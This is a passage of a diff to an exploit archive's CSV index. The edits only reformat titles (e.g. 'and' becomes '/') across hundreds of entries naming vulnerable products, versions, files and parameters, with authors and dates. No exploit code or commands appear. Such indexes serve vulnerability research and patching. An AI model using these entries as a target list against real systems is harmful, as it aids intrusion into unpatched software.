XSS",2009-08-29,Moudi,php,webapps,0 34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0 -34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution & File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 +34664,platforms/ios/webapps/34664.txt,"Briefcase 4.0 iOS - Code Execution / File Include",2014-09-15,Vulnerability-Lab,ios,webapps,0 34666,platforms/php/webapps/34666.py,"ALCASAR 2.8.1 - Remote Root Code Execution",2014-09-15,eF,php,webapps,80 34667,platforms/lin_x86-64/shellcode/34667.c,"Linux/x86-64 - Connect Back shellcode (139 bytes)",2014-09-15,MadMouse,lin_x86-64,shellcode,0 34668,platforms/windows/remote/34668.txt,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)",2014-09-15,"Daniele Linguaglossa",windows,remote,80 @@ -31257,7 +31257,7 @@ id,file,description,date,author,platform,type,port 34700,platforms/php/webapps/34700.txt,"WebShop Hun 1.062s - 'index.php' Local File Inclusion / Cross-Site Scripting",2009-07-24,u.f.,php,webapps,0 34701,platforms/php/webapps/34701.txt,"SkaLinks 1.5 - 'cat' Parameter Multiple Cross-Site Scripting Vulnerabilities",2009-07-24,Moudi,php,webapps,0 34702,platforms/php/webapps/34702.txt,"TurnkeySetup Net Marketing 6.0 - 'faqs.php' Cross-Site Scripting",2009-07-24,Moudi,php,webapps,0 -34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads Cross-Site Scripting and SQL Injection",2009-07-24,Moudi,php,webapps,0 +34703,platforms/php/webapps/34703.txt,"Million Dollar Pixel Ads Cross-Site Scripting / SQL Injection",2009-07-24,Moudi,php,webapps,0 34704,platforms/php/webapps/34704.txt,"MyDLstore Pixel Ad Script 'payment.php' Cross-Site Scripting",2009-07-21,Moudi,php,webapps,0 34705,platforms/php/webapps/34705.txt,"APBook 1.3 Admin Login Multiple SQL Injection",2009-07-21,n3w7u,php,webapps,0 34706,platforms/php/webapps/34706.txt,"MyDLstore Meta Search Engine Script 1.0 - 'url' Parameter Remote File Inclusion",2009-07-21,Moudi,php,webapps,0 @@ -31380,7 +31380,7 @@ id,file,description,date,author,platform,type,port 34838,platforms/windows/remote/34838.c,"Torrent DVD Creator 'quserex.dll' DLL Loading Arbitrary Code Execution",2010-10-13,anT!-Tr0J4n,windows,remote,0 34839,platforms/cgi/webapps/34839.py,"IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection Exploit",2014-10-01,"Claudio Viviani",cgi,webapps,0 34840,platforms/php/webapps/34840.txt,"Ronny CMS 1.1 r935 - Multiple HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 -34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting and HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 +34841,platforms/php/webapps/34841.txt,"PluXml 5.0.1 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2010-10-13,"High-Tech Bridge SA",php,webapps,0 34842,platforms/php/webapps/34842.txt,"TWiki 5.0 bin/view rev Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34843,platforms/php/webapps/34843.txt,"TWiki 5.0 bin/login Multiple Parameter XSS",2010-10-14,"DOUHINE Davy",php,webapps,0 34844,platforms/windows/remote/34844.c,"STDU Explorer 1.0.201 - 'dwmapi.dll' DLL Loading Arbitrary Code Execution",2010-10-15,anT!-Tr0J4n,windows,remote,0 @@ -31388,7 +31388,7 @@ id,file,description,date,author,platform,type,port 34846,platforms/windows/remote/34846.txt,"httpdx 1.4.5 dot Character Remote File Disclosure",2009-10-09,Dr_IDE,windows,remote,0 34847,platforms/php/webapps/34847.txt,"PHP Easy Shopping Cart 3.1R 'subitems.php' Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 34848,platforms/windows/remote/34848.c,"1CLICK DVD Converter 2.1.7.1 - Multiple DLL Loading Arbitrary Code Execution Vulnerabilities",2010-10-15,anT!-Tr0J4n,windows,remote,0 -34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local and Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 +34849,platforms/php/webapps/34849.txt,"AdvertisementManager 3.1 - 'req' Parameter Local File Inclusion / Remote File Inclusion",2010-01-19,indoushka,php,webapps,0 34850,platforms/php/webapps/34850.txt,"eXV2 CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-10-15,LiquidWorm,php,webapps,0 34851,platforms/php/webapps/34851.txt,"Bacula-Web 5.2.10 (joblogs.php jobid param) - SQL Injection",2014-10-02,wishnusakti,php,webapps,80 34852,platforms/windows/webapps/34852.txt,"Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution",2014-10-02,"Daniele Linguaglossa",windows,webapps,80 @@ -31480,7 +31480,7 @@ id,file,description,date,author,platform,type,port 34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure",2010-11-01,"Francois Harvey",php,webapps,0 34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 - Directory Traversal",2010-11-01,"John Leitch",multiple,remote,0 34946,platforms/php/webapps/34946.txt,"cformsII 11.5/13.1 Plugin for WordPress - 'lib_ajax.php' Multiple Cross-Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0 -34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting and SQL Injection",2010-10-30,MustLive,php,webapps,0 +34947,platforms/php/webapps/34947.txt,"CMS WebManager-Pro 7.4.3 - Cross-Site Scripting / SQL Injection",2010-10-30,MustLive,php,webapps,0 34948,platforms/asp/webapps/34948.txt,"Douran Portal 3.9.7.55 - Arbitrary File Upload / Cross-Site Scripting",2010-11-01,ITSecTeam,asp,webapps,0 34949,platforms/multiple/remote/34949.py,"BroadWorks Call Detail Record Security Bypass",2010-11-02,"Nick Freeman",multiple,remote,0 34950,platforms/php/remote/34950.php,"PHP 5.3.2 - 'xml_utf8_decode()' UTF-8 Input Validation",2009-05-11,root@80sec.com,php,remote,0 @@ -31601,7 +31601,7 @@ id,file,description,date,author,platform,type,port 35075,platforms/hardware/webapps/35075.txt,"CBN CH6640E/CG6640E Wireless Gateway Series - Multiple Vulnerabilities",2014-10-27,LiquidWorm,hardware,webapps,0 35076,platforms/multiple/webapps/35076.py,"HP Operations Agent Remote XSS iFrame Injection",2014-10-27,"Matt Schmidt",multiple,webapps,383 35077,platforms/windows/local/35077.txt,"Filemaker Pro 13.03 & Advanced 12.04 - Login Bypass and Privilege Escalation",2014-10-27,"Giuseppe D'Amore",windows,local,0 -35078,platforms/unix/remote/35078.rb,"Centreon SQL and Command Injection",2014-10-27,Metasploit,unix,remote,80 +35078,platforms/unix/remote/35078.rb,"Centreon - SQL Injection / Command Injection",2014-10-27,Metasploit,unix,remote,80 35079,platforms/jsp/webapps/35079.txt,"Mulesoft ESB Runtime 3.5.1 - Privilege Escalation",2014-10-27,"Brandon Perry",jsp,webapps,8585 35080,platforms/php/webapps/35080.pl,"Incredible PBX 2.0.6.5.0 - Remote Command Execution",2014-10-27,"Simo Ben Youssef",php,webapps,80 35081,platforms/linux/dos/35081.txt,"Binary File Descriptor Library (libbfd) - Out-of-Bounds Crash",2014-10-27,"Michal Zalewski",linux,dos,0 @@ -31610,7 +31610,7 @@ id,file,description,date,author,platform,type,port 35084,platforms/php/webapps/35084.txt,"WordPress Twitter Feed Plugin 'url' Parameter - Cross-Site Scripting",2010-12-07,"John Leitch",php,webapps,0 35085,platforms/cgi/webapps/35085.txt,"WWWThread 5.0.8 Pro 'showflat.pl' Cross-Site Scripting",2010-12-09,"Aliaksandr Hartsuyeu",cgi,webapps,0 35086,platforms/multiple/dos/35086.rb,"Allegro RomPager 4.07 - UPnP HTTP Request Remote Denial of Service",2010-12-08,"Ricky-Lee Birtles",multiple,dos,0 -35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local and Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 +35087,platforms/php/webapps/35087.txt,"net2ftp 0.98 - (stable) 'admin1.template.php' Local File Inclusion / Remote File Inclusion",2010-12-09,"Marcin Ressel",php,webapps,0 35088,platforms/php/webapps/35088.txt,"PHP State 'id' Parameter SQL Injection",2010-12-09,jos_ali_joe,php,webapps,0 35089,platforms/php/webapps/35089.txt,"Joomla Jeformcr 'id' Parameter SQL Injection",2010-12-09,FL0RiX,php,webapps,0 35090,platforms/php/webapps/35090.txt,"JExtensions Property Finder Component for Joomla! 'sf_id' Parameter SQL Injection",2010-12-10,FL0RiX,php,webapps,0 @@ -31633,7 +31633,7 @@ id,file,description,date,author,platform,type,port 35106,platforms/php/webapps/35106.txt,"Cetera eCommerce 'banner.php' Cross-Site Scripting",2010-12-11,MustLive,php,webapps,0 35107,platforms/cfm/webapps/35107.txt,"Mura CMS - Multiple Cross-Site Scripting Vulnerabilities",2010-12-13,"Richard Brain",cfm,webapps,0 35108,platforms/php/webapps/35108.txt,"MyBB 1.4.10 - 'tags.php' Cross-Site Scripting",2010-12-12,TEAMELITE,php,webapps,0 -35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting and SQL Injection",2010-12-13,"c0de Hunters",php,webapps,0 +35109,platforms/php/webapps/35109.txt,"PHP TopSites 2.1 - 'rate.php' Cross-Site Scripting / SQL Injection",2010-12-13,"c0de Hunters",php,webapps,0 35110,platforms/php/webapps/35110.txt,"BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-14,"Richard Brain",php,webapps,0 35111,platforms/php/webapps/35111.txt,"slickMsg - Cross-Site Scripting / HTML Injection",2010-12-15,"Aliaksandr Hartsuyeu",php,webapps,0 35112,platforms/linux/local/35112.sh,"IBM Tivoli Monitoring 6.2.2 kbbacf1 - Privilege Escalation",2014-10-29,"Robert Jaroszuk",linux,local,0 @@ -31641,7 +31641,7 @@ id,file,description,date,author,platform,type,port 35114,platforms/php/webapps/35114.txt,"MAARCH 1.4 - SQL Injection",2014-10-29,"Adrien Thierry",php,webapps,80 35115,platforms/linux/remote/35115.rb,"CUPS Filter Bash Environment Variable Code Injection",2014-10-29,Metasploit,linux,remote,631 35116,platforms/php/webapps/35116.txt,"HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting",2010-12-15,"Richard Brain",php,webapps,0 -35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e Multiple HTML Injection and Cross-Site Scripting Vulnerabilities",2010-12-15,"High-Tech Bridge SA",php,webapps,0 +35117,platforms/php/webapps/35117.txt,"BLOG:CMS 4.2.1 e - Multiple HTML Injection / Cross-Site Scripting",2010-12-15,"High-Tech Bridge SA",php,webapps,0 35118,platforms/php/webapps/35118.txt,"phpRS 'model-kits.php' SQL Injection",2010-12-16,KnocKout,php,webapps,0 35119,platforms/windows/remote/35119.txt,"Alt-N WebAdmin 3.3.3 - Remote Source Code Information Disclosure",2010-12-17,wsn1983,windows,remote,0 35120,platforms/php/webapps/35120.txt,"Radius Manager 3.6 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-17,"Rodrigo Rubira Branco",php,webapps,0 @@ -31680,7 +31680,7 @@ id,file,description,date,author,platform,type,port 35156,platforms/php/webapps/35156.txt,"Coppermine Photo Gallery 1.5.10 help.php Multiple Parameter XSS",2010-12-28,waraxe,php,webapps,0 35157,platforms/php/webapps/35157.html,"Coppermine Photo Gallery 1.5.10 - searchnew.php picfile_* Parameter XSS",2010-12-28,waraxe,php,webapps,0 35158,platforms/windows/dos/35158.py,"Mongoose 2.11 - 'Content-Length' HTTP Header Remote Denial Of Service",2010-12-27,JohnLeitch,windows,dos,0 -35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass & Reflected XSS & Stored XSS",2014-11-05,"Narendra Bhati",php,webapps,0 +35159,platforms/php/webapps/35159.txt,"Modx CMS 2.2.14 - CSRF Bypass / Reflected XSS / Stored XSS",2014-11-05,"Narendra Bhati",php,webapps,0 35160,platforms/php/webapps/35160.txt,"Mouse Media Script 1.6 - Stored XSS",2014-11-05,"Halil Dalabasmaz",php,webapps,0 35161,platforms/linux/local/35161.c,"Linux Kernel 2.6.39 <= 3.2.2 (x86/x64) - 'Mempodipper.c' Local Root (2)",2012-01-12,zx2c4,linux,local,0 35162,platforms/linux/dos/35162.cob,"GIMP 2.6.7 - Multiple File Plugins Remote Stack Buffer Overflow Vulnerabilities",2010-12-31,"non customers",linux,dos,0 @@ -31689,7 +31689,7 @@ id,file,description,date,author,platform,type,port 35165,platforms/php/webapps/35165.txt,"WikLink 0.1.3 - 'getURL.php' SQL Injection",2011-01-05,"Aliaksandr Hartsuyeu",php,webapps,0 35166,platforms/windows/remote/35166.c,"Ace Video Workshop 1.2.0.0 - 'ir50_lcs.dll' DLL Loading Arbitrary Code Execution",2011-01-03,d3c0der,windows,remote,0 35167,platforms/php/webapps/35167.txt,"Joomla 1.0.x - 'ordering' Parameter Cross-Site Scripting",2011-01-06,"Aung Khant",php,webapps,0 -35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal and Information Disclosure",2011-01-05,"Deniz Cevik",asp,webapps,0 +35168,platforms/asp/webapps/35168.txt,"BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure",2011-01-05,"Deniz Cevik",asp,webapps,0 35169,platforms/jsp/webapps/35169.txt,"Openfire 3.6.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-01-05,"Walikar Riyaz Ahemed Dawalmalik",jsp,webapps,0 35170,platforms/hardware/remote/35170.txt,"Lexmark X651de Printer Ready Message Value HTML Injection",2011-01-06,"dave b",hardware,remote,0 35171,platforms/windows/remote/35171.c,"Quick Notes Plus 5.0 47 - Multiple DLL Loading Arbitrary Code Execution",2011-01-05,d3c0der,windows,remote,0 @@ -31727,7 +31727,7 @@ id,file,description,date,author,platform,type,port 35295,platforms/php/webapps/35295.txt,"Joomla Component - 'com_frontenduseraccess' Local File Inclusion",2011-02-01,wishnusakti,php,webapps,0 35296,platforms/php/webapps/35296.txt,"eSyndiCat Directory Software 2.2/2.3 - 'preview' Parameter Cross-Site Scripting",2011-01-30,"Avram Marius",php,webapps,0 35297,platforms/php/webapps/35297.txt,"Moodle 2.0.1 - 'PHPCOVERAGE_HOME' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps,0 -35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting and Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 +35298,platforms/php/webapps/35298.txt,"TinyWebGallery 1.8.3 - Cross-Site Scripting / Local File Inclusion",2011-02-01,"Yam Mesicka",php,webapps,0 35221,platforms/php/webapps/35221.txt,"Piwigo 2.6.0 - (picture.php rate param) SQL Injection",2014-11-13,"Manuel García Cárdenas",php,webapps,80 35216,platforms/windows/local/35216.py,"Microsoft Office 2007 / 2010 - OLE Arbitrary Command Execution",2014-11-12,"Abhishek Lyall",windows,local,0 35217,platforms/windows/dos/35217.txt,"CorelDRAW X7 CDR File (CdrTxt.dll) Off-By-One Stack Corruption",2014-11-12,LiquidWorm,windows,dos,0 @@ -31860,7 +31860,7 @@ id,file,description,date,author,platform,type,port 35359,platforms/multiple/dos/35359.txt,"tcpdump 4.6.2 Geonet Decoder Denial of Service",2014-11-24,"Steffen Bauch",multiple,dos,0 35360,platforms/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie Parameter SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps,0 35361,platforms/php/webapps/35361.txt,"Escort Directory CMS SQL Injection",2011-02-19,NoNameMT,php,webapps,0 -35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion and Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 +35362,platforms/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps,0 35363,platforms/windows/dos/35363.txt,"TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF",2014-11-25,LiquidWorm,windows,dos,0 35364,platforms/multiple/remote/35364.txt,"IBM Lotus Sametime stconf.nsf/WebMessage messageString Parameter XSS",2011-02-21,"Dave Daly",multiple,remote,0 35365,platforms/php/webapps/35365.py,"phpMyRecipes 1.2.2 - (dosearch.php words_exact param) SQL Injection",2014-11-25,bard,php,webapps,80 @@ -31921,7 +31921,7 @@ id,file,description,date,author,platform,type,port 35427,platforms/bsd/remote/35427.py,"tnftp - clientside BSD Exploit",2014-12-02,dash,bsd,remote,0 35428,platforms/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps,0 35429,platforms/php/webapps/35429.txt,"PhotoSmash Galleries WordPress Plugin 1.0.x - 'action' Parameter Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps,0 -35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting and SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +35430,platforms/php/webapps/35430.txt,"1 Flash Gallery WordPress Plugin 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps,0 35431,platforms/php/webapps/35431.txt,"RuubikCMS 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps,0 35432,platforms/linux/dos/35432.txt,"Wireshark 1.4.3 - NTLMSSP NULL Pointer Dereference Denial Of Service",2011-03-01,"Buildbot Builder",linux,dos,0 35433,platforms/osx/remote/35433.pl,"Apple QuickTime 7.5 - (.m3u) Remote Stack Buffer Overflow",2011-03-09,KedAns-Dz,osx,remote,0 @@ -31929,7 +31929,7 @@ id,file,description,date,author,platform,type,port 35435,platforms/php/webapps/35435.txt,"Lazyest Gallery WordPress Plugin 1.0.26 - 'image' Parameter Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps,0 35436,platforms/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps,0 35437,platforms/multiple/dos/35437.pl,"Air Contacts Lite HTTP Packet Denial Of Service",2011-02-09,"Rodrigo Escobar",multiple,dos,0 -35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting and SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 +35438,platforms/cgi/webapps/35438.txt,"CosmoShop 10.05.00 - Multiple Cross-Site Scripting / SQL Injection",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0 35439,platforms/php/webapps/35439.txt,"WordPress Nextend Facebook Connect Plugin 1.4.59 - XSS",2014-12-02,"Kacper Szurek",php,webapps,80 35440,platforms/osx/local/35440.rb,"Mac OS X - IOKit Keyboard Driver Privilege Escalation",2014-12-02,Metasploit,osx,local,0 35441,platforms/multiple/remote/35441.rb,"Tincd Post-Authentication Remote TCP Stack Buffer Overflow",2014-12-02,Metasploit,multiple,remote,655 @@ -31952,7 +31952,7 @@ id,file,description,date,author,platform,type,port 35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 35460,platforms/php/webapps/35460.txt,"CodeArt Google MP3 Player WordPress Plugin - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 35564,platforms/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps,0 -35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting and SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 +35565,platforms/php/webapps/35565.txt,"Anantasoft Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps,0 35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection",2014-12-04,"Robert Cooper",cgi,webapps,80 35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass",2011-03-14,"DcLabs Security Research Group",multiple,remote,0 @@ -31969,7 +31969,7 @@ id,file,description,date,author,platform,type,port 35477,platforms/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps,0 35478,platforms/linux/dos/35478.txt,"MHonArc 2.6.16 Tag Nesting Remote Denial of Service",2010-12-21,anonymous,linux,dos,0 35479,platforms/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' Parameter HTML Injection",2011-03-19,Hector.x90,php,webapps,0 -35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross-Site Scripting and SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 +35480,platforms/php/webapps/35480.txt,"Online store php script Multiple Cross-Site Scripting / SQL Injection",2011-03-21,"kurdish hackers team",php,webapps,0 35481,platforms/php/webapps/35481.txt,"NewsPortal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35482,platforms/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Parameter Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps,0 35483,platforms/php/dos/35483.txt,"PHP 5.3.x - 'Intl' Extension 'NumberFormatter::setSymbol()' Function Denial of Service",2011-03-10,thoger,php,dos,0 @@ -31986,7 +31986,7 @@ id,file,description,date,author,platform,type,port 35495,platforms/multiple/remote/35495.txt,"Advantech/BroadWin SCADA WebAccess 7.0 - Multiple Remote Security Vulnerabilities",2011-03-23,"Ruben Santamarta ",multiple,remote,0 35496,platforms/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps,0 35497,platforms/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps,0 -35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting and Multiple SQL Injection",2011-03-24,"High-Tech Bridge SA",php,webapps,0 +35498,platforms/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injection",2011-03-24,"High-Tech Bridge SA",php,webapps,0 35499,platforms/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Parameter Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps,0 35500,platforms/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' Parameter HTML Injection",2011-03-25,"Zero Science Lab",php,webapps,0 35501,platforms/multiple/remote/35501.pl,"RealPlayer 11 - (.rmp) Remote Buffer Overflow",2011-03-27,KedAns-Dz,multiple,remote,0 @@ -32000,7 +32000,7 @@ id,file,description,date,author,platform,type,port 35505,platforms/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps,0 35506,platforms/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection Exploit",2014-12-09,"ZoRLu Bugrahan",php,webapps,0 35507,platforms/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,windows,dos,0 -35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross-Site Scripting and SQL Injection",2011-03-27,MustLive,php,webapps,0 +35508,platforms/php/webapps/35508.txt,"Cetera eCommerce Multiple Cross-Site Scripting / SQL Injection",2011-03-27,MustLive,php,webapps,0 35509,platforms/windows/remote/35509.pl,"FLVPlayer4Free 2.9 - (.fp4f) Remote Buffer Overflow",2011-03-27,KedAns-Dz,windows,remote,0 35510,platforms/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 35511,platforms/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent XSS vulnerabilities",2014-12-10,"Jos Wetzels, Emiel Florijn",php,webapps,0 @@ -32014,7 +32014,7 @@ id,file,description,date,author,platform,type,port 35557,platforms/php/webapps/35557.txt,"PHP-Fusion 'article_id' Parameter SQL Injection",2011-04-04,KedAns-Dz,php,webapps,0 35519,platforms/lin_x86/shellcode/35519.txt,"Linux/x86 - rmdir shellcode (37 bytes)",2014-12-11,kw4,lin_x86,shellcode,0 35520,platforms/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps,0 -35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting and Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 +35521,platforms/php/webapps/35521.txt,"osCSS 2.1 - Cross-Site Scripting / Multiple Local File Inclusion",2011-03-29,"AutoSec Tools",php,webapps,0 35522,platforms/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps,0 35523,platforms/php/webapps/35523.txt,"Tracks 1.7.2 URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps,0 35524,platforms/php/webapps/35524.txt,"XOOPS 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps,0 @@ -32034,7 +32034,7 @@ id,file,description,date,author,platform,type,port 35562,platforms/php/webapps/35562.txt,"Placester WordPress Plugin 0.1 - 'ajax_action' Parameter Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps,0 35563,platforms/windows/remote/35563.pl,"EasyPHP 5.3.5.0 - 'index.php' Arbitrary File Download",2011-04-03,KedAns-Dz,windows,remote,0 35541,platforms/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - XSS / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps,0 -35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation and Command Execution",2014-12-17,Chako,hardware,webapps,0 +35556,platforms/hardware/webapps/35556.txt,"CIK Telecom VoIP router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps,0 35543,platforms/php/webapps/35543.txt,"WordPress Wp Symposium 14.11 - Unauthenticated Shell Upload Exploit",2014-12-15,"Claudio Viviani",php,webapps,0 35549,platforms/unix/remote/35549.rb,"ActualAnalyzer 'ant' Cookie Command Execution",2014-12-16,Metasploit,unix,remote,80 35545,platforms/php/remote/35545.rb,"Tuleap PHP Unserialize Code Execution",2014-12-15,Metasploit,php,remote,80 @@ -32082,7 +32082,7 @@ id,file,description,date,author,platform,type,port 35604,platforms/php/webapps/35604.txt,"eForum 1.1 - '/eforum.php' Arbitrary File Upload",2011-04-09,QSecure,php,webapps,0 35605,platforms/php/webapps/35605.txt,"Lazarus Guestbook 1.22 - Multiple Vulnerabilities",2014-12-24,TaurusOmar,php,webapps,80 35606,platforms/linux/remote/35606.txt,"MIT Kerberos 5 kadmind Change Password Feature Remote Code Execution",2011-04-11,"Felipe Ortega",linux,remote,0 -35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local and Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 +35607,platforms/php/webapps/35607.txt,"Spellchecker Plugin 3.1 for WordPress - 'general.php' Local File Inclusion / Remote File Inclusion",2011-04-12,"Dr Trojan",php,webapps,0 35608,platforms/php/webapps/35608.txt,"The Gazette Edition 2.9.4 For WordPress - Multiple Security Vulnerabilities",2011-04-12,MustLive,php,webapps,0 35609,platforms/php/webapps/35609.txt,"WebCalendar 1.2.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-12,"High-Tech Bridge SA",php,webapps,0 35610,platforms/php/webapps/35610.txt,"Plogger 1.0 RC1 - 'gallery_name' Parameter Cross-Site Scripting",2011-04-12,"High-Tech Bridge SA",php,webapps,0 @@ -32094,9 +32094,9 @@ id,file,description,date,author,platform,type,port 35616,platforms/php/webapps/35616.txt,"Agahi Advertisement CMS 4.0 - 'view_ad.php' SQL Injection",2011-04-15,"Sepehr Security Team",php,webapps,0 35617,platforms/php/webapps/35617.txt,"Qianbo Enterprise Web Site Management System 'Keyword' Parameter Cross-Site Scripting",2011-04-14,d3c0der,php,webapps,0 35618,platforms/php/webapps/35618.txt,"RunCMS 'partners' Module 'id' Parameter SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 -35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion and SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 +35619,platforms/php/webapps/35619.txt,"PhoenixCMS 1.7 - Local File Inclusion / SQL Injection",2011-04-15,KedAns-Dz,php,webapps,0 35620,platforms/hardware/remote/35620.txt,"Technicolor THOMSON TG585v7 Wireless Router 'url' Parameter Cross-Site Scripting",2011-04-15,"Edgard Chammas",hardware,remote,0 -35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 - Multiple Remote File Inclusion and SQL Injection",2011-04-16,KedAns-Dz,php,webapps,0 +35621,platforms/php/webapps/35621.txt,"4Images 1.7.9 